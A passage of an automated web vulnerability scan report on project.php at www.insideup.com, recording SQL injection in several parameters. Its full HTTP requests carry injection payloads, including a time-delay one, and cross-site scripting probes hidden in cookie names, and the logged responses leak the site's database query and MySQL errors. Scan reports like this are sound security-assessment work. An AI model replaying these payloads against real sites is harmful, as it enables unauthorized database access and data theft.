Date: Mon, 14 Mar 2011 02:01:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=dgh24asoiqhkul4607h81evfo1; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.137. http://www.insideup.com/ppc/leadflow/caad00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the firstname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9jf1frv42ta6nebpsngjvh17i6; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.138. http://www.insideup.com/ppc/leadflow/caad00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2222
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'/'
   union select prj.catId,p' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc'' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:54:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.139. http://www.insideup.com/ppc/leadflow/caad00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:54:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=35o0m1mouhdhv4gr2iqparo4a4; path=/
Content-Length: 6638
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.140. http://www.insideup.com/ppc/leadflow/caad00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6odp9dajlk2hn3hcgmggfn31a6; path=/
Content-Length: 6702
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o85bro90n4an481g7ub1l91cl7; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.141. http://www.insideup.com/ppc/leadflow/caad00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=90jnq0fvms20ufqsvhciko13r0; path=/
Content-Length: 6734
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
<iMg src=N onerror=netsparker(9)>&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5dde61p9mjd4kuvuij344s7ba6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51731


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.142. http://www.insideup.com/ppc/leadflow/caad00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

